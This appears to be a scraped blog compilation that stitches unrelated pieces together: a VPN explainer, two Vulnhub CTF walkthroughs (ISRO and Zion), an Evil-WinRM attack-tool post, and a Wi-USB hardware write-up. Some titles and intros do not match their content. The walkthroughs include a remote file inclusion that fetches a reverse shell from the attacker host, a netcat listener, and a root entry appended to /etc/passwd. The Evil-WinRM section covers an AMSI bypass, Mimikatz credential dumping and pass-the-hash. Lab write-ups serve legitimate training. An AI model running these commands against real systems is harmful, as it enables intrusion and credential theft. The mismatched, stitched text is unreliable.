How VPN Technology Protects Your Privacy from Hackers

 

Introduction

Picture this; the year is 2020. People store their most sensitive data online. They blindly trust that their information is safe, and they do nothing to protect it. Criminals can hack into these people’s computers and steal all of their information, ruining their lives.

This isn’t the plot to a dystopian movie; this is real life.

Cyber Attacks

Cyber attacks are happening every day, and few people do anything to stop it. Even on the heels of enormous data attacks last year, people were mostly unphased. 7.9 billion consumer records were hacked into last year, which is terrifying. It might just be the case that people aren’t familiar with using a VPN.

Why is VPN Useful?

A VPN is a means of protecting someone when they’re online.

A way to think about life online is someone driving an empty bus. Every time that person performs any action online, they get a passenger to walk into the bus. That passenger has a briefcase with invoices, receipts, time spent on the page, and pages the driver visited. The big problem is that passengers will never get off the bus. Every new page clicked online equals a new passenger on the bus.

There are a few problems with this situation. First off, the briefcases have no locks on them. Whoever holds them, can open it and look through all of the documents.

This leads to the second point. The documents enclosed are incredibly private and sensitive. They could contain Social Security and credit card numbers, a huge list of transaction history, as well as a timestamp of every site ever visited.

Some people may not see this as an issue. As long as they’re driving the bus and they keep the door closed, why should they have to worry?

Well, if the driver did anything illegal and the police pull them over, the police can look in every single briefcase on that bus. Even worse, if a criminal hijacks the bus, they can take every briefcase for themselves.

This is where a VPN comes in. A VPN acts as a second, unregistered, self-driving bus.

Now, when the user makes an interaction online, the passenger goes into the self-driving bus with their briefcase. The internet user’s bus will stay empty at all times.

The other key point is that these passenger’s briefcases will be mostly empty. There will be no names registered to the information. All of the sensitive information will be encrypted and unreadable.

VPN is a Universal Concept

All across the globe, people care to protect their sensitive information. Luckily, a VPN is not region-specific. In other words, an American can use a VPN server in Australia. Due to the different levels of technology across the world, a lot of people are recommending Indian VPN server. The reason is that India has a huge infrastructure set up in the technology space.

Using a VPN server from another country takes yet another step to protect the user. Since it creates another step between the user and the information, it keeps them even safer.

Who is a VPN for?

This is not to be misconstrued, though. A VPN is not just for criminals or want to stay invisible as they break the law. In fact, the most notorious online criminal was found and arrested despite his VPN usage. No, a VPN is not for criminals.

A VPN should ideally be used for anyone who uses the internet. It keeps information private and keeps people safe.

Ultimately, it’s taking matters into one’s own hands. It’s been proven time and time again that companies do not value customer information as much as the customers do. They don’t take the necessary precautions. This leads to breach after breach of customer information over the years.

The way a customer’s information stays safe is if the customer keeps it safe. A VPN should be used by anyone who accesses the internet.

Other Uses for a VPN

A VPN is not just used to keep data secure, there are actually a lot of uses.

Some countries have very strict restrictions on their internet usage. For example, over the years different countries completely blocked the use of Facebook. They use geo-tags to block a user’s access to the site based on their physical location. One of the things that a VPN does is strip away a user’s geo-tags. Someone in a country that blocks a site can still access the site using a VPN.

Another common use of a VPN is done in the company’s offices. By having a VPN set up, the workers can go home and access their computer. It works on the same principle as a Facebook blockage. The VPN confuses the workstation, making it think it’s still in the office. A VPN lets office workers work from home without any problem.

Sometimes sites like Netflix, Hulu, or Pandora only allow people in a certain country to enjoy certain content. This can get frustrating and oftentimes it’s due to contract agreements. This is yet another place where a VPN shines. The user can put on their VPN mask and access content that would otherwise be inaccessible from continents away.

Conclusion

Overall there are a lot of interesting facts and uses for VPNs. They protect people from cyberattacks, they keep everyone’s data safe, and they keep hackers away from the user’s sensitive information.

VPNs have use for anyone who accesses the internet. It can help people in countries that have internet restrictions, help office workers work from home, and allow people to view content from other countries. It’s a very interesting technology, and as the world develops there’s sure to be more uses for it

HA: ISRO Vulnhub Walkthrough

Today we are going to solve our CTF challenge called “HA: Infinity Stones” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find 4 Flags on the victim’s machine.

Penetration Methodologies

• Scanning Network
  • Netdiscover
  • Nmap
• Enumeration
  • Browsing HTTP Service
  • Performing Directory Bruteforce
• Exploitation
  • LFI
  • Create PHP reverse shell
  • Reading /etc/passwd file
  • Getting a reverse connection
  • Spawning a TTY Shell
• Privilege Escalation
  • Writable etc/passwd File

Walkthrough

Scanning Network

Firsts of all we try to identify our target and for this use the following command:

netdiscover

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

nmap -A 192.168.1.104

Enumeration

With the help of help scan, we now know that port number 22, 80 are open with the service of SSH, HTTP respectively. Now that port 80 is open we open the target IP address in our browser as shown in the following image:

http://192.168.1.104

It opened a webpage as shown in the above image. Here we found the Bhaskara page, so now we opened and found an information webpage there as shown in the image below:

http://192.168.1.104/bhaskara.html

As a convention, we will enumerate the webpage by going through the source code. We see that we have the Bhaskara Launch Code. This seems a base64 encoded text.

Now we got to decode it. To do this we will be using the combination of the echo command and the base64 -d.

echo "L2JoYXNrYXJh" 1 base64 -d

After decoding the base64 encoded text we get “/bhaskara”. This seems a hint that there might be a directory named bhaskara.

So, we went on to our browser in order to browse the bhaskara directory. We see that a file is downloaded when we browse the URL. This is a 2MB file. After enumerating the file, we came to realize that it is a TrueCrypt file.

Now in order to crack this file, we are going to use extract its hash using the true.py. You can download the true.py from this link. We named the file as true.py and ran it and it gave us the password as xavier.

python true.py bhaskara > hashes
john hashes --show

Now as we knew it was a TrueCrypt file. That means it might be hiding something inside it. So, we tried to open it using VeraCrypt by providing it path and selecting a volume as shown in the given image. 

Upon mounting the TrueCrypt file on a slot, we are asked to enter the password. We enter the password that we found earlier i.e. ‘xavier’ 

 It opened up to show a text file labelled ‘flag.txt’. We opened it; it gave us our first flag. Bhaskara Flag.

Bhaskara Flag: {b7bb88578a70970b9be45ac8630b6f9d}

Now let’s move forward in Enumeration. We also performed a directory scan. This gave us an /img directory. We performed an extension directory scan. It gave us a connect.php.

dirb http://192.168.1.104
dirb http://192.168.1.104 -X .php

We went into the /img directory. Here we found an image called aryabhata.jpg.

We will download the aryabhata.jpg and opened it.  

Upon opening it we found it to be the poster for Aryabhata satellite as shown in the image given below.

As we couldn’t find anything specific with the image, we suspected that there is some steganography involved. Hence, we decided to use the Steghide tool to extract anything that might be hidden in the image. We saw that there is a text file named flag.txt hidden inside it. On opening it we found the Aryabhata flag. 

steghide extract -sf aryabhata.jpg
cat flag.txt

Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation

Back to the Web Browser, we also found a connect.php in our drib directory bruteforce. This gave us nothing. Then we realized that this can be command injection. Now to test we tried opening the etc/passwd file through it. As seen in the image given below, we see that it’s a File Inclusion Vulnerability.

192.168.1.104/connect.php?file=/etc/passwd

We edited our shell.php, to enter the attacker machine IP address. And then closed the file after saving it. Now we need to send this to the target machine. Hence, we started a python http server using the one-liner showed below.

nano shell.php
python -m SimpleHTTPServer

We are gonna capture a reverse connection using the netcat. So we need to initiate a listener on the port mentioned in the shell file.

nc -lvp 1234

After starting the listener on the target machine, we will run the shell on the target machine using the File Inclusion Vulnerability.

192.168.1.104/connect.php?file=http://192.168.1.103:8000/shell.php

Upon execution, the shell gave us a session to the target machine. As seen in the image given below, it wasn’t a proper shell. So, we needed a python one liner to convert it into a proper shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'

We used netstat command to check for the IP address and ports the target machine is listening on and found that a web service (3306) is allowed for localhost only. The most common service to run on the port 3306 is MySQL. Let’s enumerate in that direction.

netstat -antp

We tried to login in the MySQL database as the root user. After logging in the MySQL, we enumerated the databases. Here we found a database named ‘flag’. We looked inside the tables of flag database. Here we found our second flag Mangalyaan Flag.

mysql -u root 
show databases;
use flag;
show tables;
select * from flag;

Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435}

Privilege Escalation

As a part of our Enumeration for Escalating Privilege on the target machine, we try to find if the /etc/passwd is writable. We can see that the file is, in fact, writable. This is our way to move forward.

ls -la /etc/passwd

Now we going to need the password hash for the user that we are going to create on the target machine by making an entry in the /etc/passwd file. We are going to use the openssl to generate a salted hash.

openssl passwd -1 -salt user3 pass123

Now back to our remote shell on the target machine. Here we are going to use the hash that we generated in the previous step and make a user raj which has the elevated privilege. We used the echo command to make an entry in the /etc/passwd file. After making an entry we checked the entry using the tail command. Now, all we got to do is run su command with the user name we just created and enter the password and we have the root shell. We traversed inside the root directory to find our final flag, Chandrayaan Flag.

echo 'raj:$1$user3$rAGRVf5p2jYTqtq0W5cPu/:0:0::/root:/bin/bash' >>/etc/passwd
tail /etc/passwd
su raj
Password: pass123
cd /root
ls
cat final.txt

Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2} 

Evil-Winrm : Winrm Pentesting Framework

In this post, we will discuss the most famous framework for PS Remote shell hacking tool named as “Evil-Winrm”. It is an opensource tool which is available on GitHub for winrm penetration testing.

Table of Content

• Evil-winrm
• Features
• Installation
• Load PowerShell scripts
• Pass the Hash
• Install using its Docker image

Evil-winrm

This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but most of its features are focused on hacking/pentesting stuff.

Features

• Compatible to Linux and Windows client systems
• Load in memory Powershell scripts
• Load in memory dll files bypassing some AVs
• Load in memory C# (C Sharp) assemblies bypassing some AVs
• Load x64 payloads generated with awesome donut technique
• AMSI Bypass
• Pass-the-hash support
• Kerberos auth support
• SSL and certificates support
• Upload and download files showing a progress bar
• List remote machine services without privileges
• Command History
• WinRM command completion
• Local files completion
• Colorization on prompt and output messages (can be disabled optionally)
• Docker support (prebuilt images available at Dockerhub)
• Trap capturing to avoid accidental shell exit on Ctrl+C

Installation 

In the post, we have discussed two easy methods to install winrm in your Kali Linux, you will find more method for installation from GitHub.

With the help of Ruby gem, you can directly install the evil-winrm, it will automatically install all dependency in your machine by executing following command.

gem install evil-winrm

once it will get installed you can pull its HELP option by typing ‘evil-winrm’ that will display the syntax and other operators for executing evil-winrm against windows remote management service.

Now using evil-winrm we try to access remote machine shell by connecting through port 5985 open for winrm. As a result, it will give the access of victim shell by providing its Powershell as given below.

Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’>

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987'

It will not only provide a shell of the host machine but also provide a menu to load function such as Invoke-Binary, Dll-Loader, Donut-Loader and Bypass-4MSI.

Load PowerShell scripts

So we have some pen testing powershell script in the /root/powershell and we can upload this ps1 script through evil winrm on the host machine.

The .PS1 scripts must be in the path set at -s argument and execute this as given below:

Syntax: evil-winrm -i <Windows IP> -u <username> -p <’password’> -s <path>

evil-winrm -i 192.168.1.105 -u administrator -p 'Ignite@987' -s /root/powershell

Type menu again and see the loaded functions and use Bypass 4MSI then Invoke the script. Here we have tried to upload mimikatz PowerShell script to dump stored credential.

menu
Bypass 4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz

As a result, it has dumped all the credential of the Windows Server. 

Pass the Hash

It has one more feature which allows you to conduct Pass the HASH attack and as a result it gives the shell of the host machine.

Install using its Docker image

This is a very easy and convenient method to install winrm on your attacking machine and simultaneously provide the shell of the victim machine by compromising it winrm service. Only you need to execute the following command.

docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'

+------------------------------------------------- This is only an educational purposes only I am not responsible for further activities Join my forum and learn more ethical hacking and penetration testing https://t.me/WhiteHatHacks Get me at alex14324.blogspot.com https://t.me/alex14324 https://github.com/alex14324 https://discord.gg/6NPtGxZ
-------------------------------------------------------+

Zion Vulnhub Walkthrough

Today, I am going to share a writeup for the boot2root challenge of the Vulnhub machine “Zion”. It was actually an intermediate box based on the Linux machine. The goal for this machine is to read the flag.txt file.

Penetration Testing Methodology

• Network Scanning
  • Netdiscover scan
  • Nmap Scan
• Enumeration
  • Enumerating HTTP service on Browser
  • Inspecting the Login Panel using BurpSuite
  • Decoding Base64 and Base62 messages
• Exploitation
  • Crafting the Dictionary using Cewl
  • Bruteforcing using BurpSuite
  • Enumerating the Web Application
• Post Exploitation
  • Connecting using SSH
  • Enumerating for Sudo Rights
• Privilege Escalation
  • Abusing Sudo Rights on cp

Walkthrough

Network Scanning

We begin by scanning our network for the target machine using Netdiscover. The target machine is active on 192.168.1.109. Let’s scan it and see which services are running and which ports are open.

We do an aggressive scan on the target using nmap.

nmap -p- -A 192.168.1.109

Enumeration

The scan gives us a lot of good and useful information, but what stands out the most is that port 22 and 80 are open, let’s explore port 80 first and see what we can find there.

Here we see that we have 2 buttons, The “Truth” and “Illusion”. We are given the choice for the Red Pill and Blue Pill similar situation as Neo faced in the Matrix Trilogy by Morpheus. Clicking on the Truth button, we get to a login page.

After looking around the login panel for some time, I decided to inspect the panel through the BurpSuite. I captured the request in the BurpSuite. Sent the request to the Repeater. Here, upon checking the response of the request, we see that there are some odd parameters containing values that seem to be encrypted.

Guessing that the encryption might be Base64, I decided to decode the banner value using the Decoder. This gave us a message that tells us to “Open our mind”. Also it tells us to avoid some characters.

This means that the message that was left to us is not exactly Base64. If we avoid the characters mentioned in the message we get the encryption that is Base62. So, let’s try to decrypt the message using a Base62 decrypter. You can find one online.

The message that was decoded was that it is giving us the hints for the credentials for the “Zion’s Systems”. It tells us to look at the choice page that we were on few moments before. Also, it gives us the username for the user “morpheus.thematrix”. It also tells us that the user likes to keep simple passwords.

Exploitation

There are multiple methods as to how we can try to get the passwords. We can try manually but when we have an arsenal of tools that can do this for us why waste the time. I decided to create a dictionary that can be used to bruteforce the login using cewl. Using cewl is quite simple, we need to provide the URL and the output file path. Cewl will run and create a dictionary for  all the words that are on the webpage.

cewl http://192.168.1.109/ -w dict.txt

Now for the brute force, we decide to use the BurpSuite’s Intruder Module. To use Intruder, we need capture the request at the “Login” button with some sample text inside the password box.

Now that we have the request, we can use it to brute force the login using the Intruder. I gave the sample text as “test”. We can send the request to Intruder using the shortcut “Ctrl + I”.

After sending the request to Intruder, we go to the Positions Tab. Here we select the Attack type as Sniper. After setting the Attack type we need to specify the Payload Positions. This is the particular text that is going to be brute-forced. Here we want to brute force the password parameter. So we select the “test” as a place holder. Add the “§” symbol around the text as shown in the image given below by clicking the “Add §” button.

Next, we moved onto the Payloads Tab. Here we have multiple sections to provide the type of payload we want to provide for the bruteforce. Payload here means the dictionary that we created using Cewl previously. We need to provide the Simple list in the Payload type option under the Payload Sets section. Next, we need to add the contents of the dictionary we created. For this we will use the Load button in the Payload Options section. This will open up a window where we can browse the dictionary we created. After doing the above steps we click on the Start attack button.

Clicking on the Start attack button opens up a yet other windows where we can see the Burp Suite try multiple requests from the dictionary. We see that we get a redirection from the password interpreted. This could mean that this is the password. Time to check it out.

We go back to the Login Panel, and try the following credentials to login.

Username: morpheus.thematrix
Password: interpreted

This opens up the Zion’s System. Here we see some information about the user w.rabbit . It tells that the user w.rabbit has forgotten his password. So, the Administrator has disabled its logins using the password. But he did something related to the movies. Matrix, I suppose. Also, I see that there is a link for Private key in the top right sections as shown in the image given below.

The link leads us to a page called rabbit-hole/rsa_priv_key_for_w.rabbit.txt. This is a private key for the user w.rabbit. This means we can login into SSH using this user.

Post Exploitation

I copied the contents of the key and saved it into a empty file and save it as “key”. Now, since we have the port 22 open on the Target Machine, we will try to login on SSH using this key.  From some enumeration we find the warning.txt file. Here we see that we have to find the flag in the path mentioned. We are given the freedom to choose any method or technique we want. Enumerating further into the mail directory, I found the credentials for the user w.rabbit. We are already logged in as w.rabbit user but with the password we can run process as user w.rabbit. To find out what services we can run with elevated permissions. We can see that cp command can be run with elevated privileges as user dozer.

ssh -i key w.rabbit@192.168.1.109
cat warning.txt
cat w.rabbit.txt
sudo -l

This means that we can run the cp command without any password or other verification.

Privilege Escalation

In the above step we got the that we can access /bin/cp as sudo for both w.rabbit and dozer and in the process of enumeration we got the sudo password for the w.rabbit. So, let’s try to use the /bin/cp file to escalate to the dozer using /bin/sudo. Using cp i.e copy command we will copy the flag.txt in the tmp folder to display the flag.txt using below command.

/bin/sudo -u dozer /bin/cp --no-preserve=mode,ownership /home/dozer/flag.txt /tmp/flag.txt
cat flag.txt

Here we got our /home/dozer/flag.txt. So that’s for now. See you next time

+------------------------------------------------- This is only an educational purposes only I am not responsible for further activities Join my forum and learn more ethical hacking and penetration testing https://t.me/WhiteHatHacks Get me at alex14324.blogspot.com https://t.me/alex14324 https://github.com/alex14324 https://discord.gg/6NPtGxZ -------------------------------------------------------+

Protect Your USB ports from USB killer with Wi-USB

For Wireless USB for Instant IoT

Short explanation:

This is a device that allows you to connect almost any USB device to your computer....without a USB cable. It uses a USB message to IP message wrapper and creates a simple virtual COM port on your PC. This device is a true USB host and you can use it to make almost any USB device instantly wireless. 

It works very reliably (as long as your wifi signal strength not poor), and seems to be the quickest way to get a project both wireless and on the internet.

Long explanation:

Imagine if you will: You have an Arduino connected to your PC via good old USB. THEN....you cut that USB cable in half, and attach an antenna to either cable stump. Then, you move the Arduino further away from your computer, maybe you even move it to the other side of house.

You click "Upload" in the Arduino IDE and voila!...the sketch uploads successfully. If your sketch has the Arduino writing over serial, you can even open the serial monitor and your data comes through, no problem.

Oh you don't use Arduinos? Okay, maybe you use a USB webcam, or a USB-controlled 3D printer, a normal printer, a USB nerf turret...or even some other fancy new microcontroller. Either way, it is now totally wireless, and you didn't need to write (or even copy and paste) a single line of code.

That's what I wanted, and, as is typical for me, what pretty much didn't exist. 

So I did it myself!

Here is how it works: The Linux Single-Board-Computer (SBC) inside the 3D printed case has a "USB host" port, which basically means it can have slave devices (arduinos, flash drives, 3D printers, etc) connect to it. Your PC has lots of host ports, whereas your Arduino has none. That's why you can't connect two Arduinos together via USB (not without a host shield at least, and even then, you'd need drivers!).

SO, we have a USB host port. That's the first step in the right direction. Now, we need the Linux SBC to be connected to your home wireless network. Let's skip the details for now, but take my word for it...that part is easy. Great, now our Linux SBC is on your wifi!

Then, we connect something...(let's say an Arduino for now, as an example)...to the USB host port on the Linux SBC.

This is when the Linux SBC starts doing something sneaky, and clever. It reads the USB messages zooming to and from your Arduino, and uses a "USB/IP" protocol to wrap those messages up into little IP messages. Now, these IP messages (secretly USB messages), get sent over your network back to your PC. Your PC is running some nice software that knows how to convert these IP messages BACK into USB messages. It feeds these USB messages into a "Virtual USB port", which is basically a real USB port, as far as your PC is concerned.

After that, you're good to go - Device Manager will show that an Arduino is connected on COM-XYZ. Fire up the Arduino IDE and upload a sketch, it works, no problem. From here on out, the system behaves as if you are connected directly via USB....but you know better. The little bugger is actually all the way upstairs, tending to your automated houseplant watering system. 

Side rant about why I went down this track:

Now that it is the year 2017, it seems like every project is supposed to be an "IoT" project of some kind.

I've done my fair share of ESP8266 projects, but as a relatively weak coder, it usually ends up slowing me down a LOT when it comes time to code up a little nodejs page or parsing some long string of data from one or more sensors.

The last ten years has seen a literal revolution in accessibility to powerful tools for hobbyists and engineers, but connecting stuff to the internet (or just being wireless in any sense) continues to be a challenge if you aren't a strong programmer. Admittedly, the learning curve is better than it has ever been, but I am spoiled and I want to connect my projects to the internet in...a minute.....and have it be over with and just work.

There are some pretty great products out there now (and even greater community support and how-to articles!) but I still feel like there is a little gap when it comes to INSTANT IoT. That's why I did this project, and I hope that some people in this community will like it!